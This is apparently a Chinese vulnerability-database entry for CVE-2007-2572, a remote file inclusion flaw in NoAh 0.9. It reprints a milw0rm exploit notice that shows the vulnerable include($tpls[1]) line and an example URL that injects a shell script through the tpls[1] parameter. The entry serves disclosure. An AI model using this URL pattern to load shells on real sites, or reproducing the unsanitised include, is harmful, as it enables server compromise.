NoAh 'mfa_theme.php' tpls[1]参数远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112871 漏洞类型 代码注入
发布时间 2007-05-06 更新时间 2007-05-09
CVE编号 CVE-2007-2572 CNNVD-ID CNNVD-200705-151
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3861
https://www.securityfocus.com/bid/86179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-151
|漏洞详情
NoAh(又称PHPContentArchitect,phparch)的modules/noevents/templates/mfa_theme.php中存在PHP远程文件包含漏洞。远程攻击者可以借助tpls[1]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
##############################################################################################
##############################################################################################
#NoAh 0.9 The PHP Content Architect <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:noah/modules/noevents/templates/mfa_theme.php
#
<?php include($tpls[1]); ?>
#
#BUG:
#
#Example:http://site.com/path/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[[Sh3LL
Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/project/showfiles.php?group_id=131995&package_id=148681&release_id=318628
##############################################################################################
#
#kezzap66345@hotmail.com
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-06]
|受影响的产品
Noah Noah 0.9 Pre 1.2
|参考资料

来源:XF
名称:noah-mfatheme-file-include(34103)
链接:http://xforce.iss.net/xforce/xfdb/34103
来源:MILW0RM
名称:3861
链接:http://www.milw0rm.com/exploits/3861
来源:VUPEN
名称:ADV-2007-1676
链接:http://www.frsirt.com/english/advisories/2007/1676
来源:OSVDB
名称:37656
链接:http://osvdb.org/37656